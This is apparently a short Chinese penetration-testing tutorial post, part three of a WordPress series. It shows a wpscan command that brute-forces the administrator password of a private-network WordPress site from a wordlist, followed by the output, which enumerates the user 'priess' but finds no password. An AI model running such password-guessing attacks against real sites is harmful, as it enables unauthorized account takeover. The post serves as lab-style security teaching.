wordpress渗透测试（三）

libo

暴力破解管理员密码
命令：

1. wpscan --url http://192.168.3.234:8081 --wordlist ~/pass.txt

复制代码

结果如下

1. [+] Enumerating plugins from passive detection ...
   
2. [+] No plugins found
   
3. 
   
4. [+] Enumerating usernames ...
   
5. [+] Identified the following 1 user/s:
   
6.     +----+--------+----------+
   
7.     | Id | Login  | Name     |
   
8.     +----+--------+----------+
   
9.     | 1  | priess | priess – |
   
10.     +----+--------+----------+
    
11. [+] Starting the password brute forcer
    
12.   [!] ERROR: We received an unknown response for login: priess and password: zhanglu
    
13.   Brute Forcing 'priess' Time: 00:00:03 <===== > (19 / 20) 95.00%  ETA: 00:00:00
    
14. 
    
15.   +----+--------+----------+----------+
    
16.   | Id | Login  | Name     | Password |
    
17.   +----+--------+----------+----------+
    
18.   | 1  | priess | priess – |          |
    
19.   +----+--------+----------+----------+
    

复制代码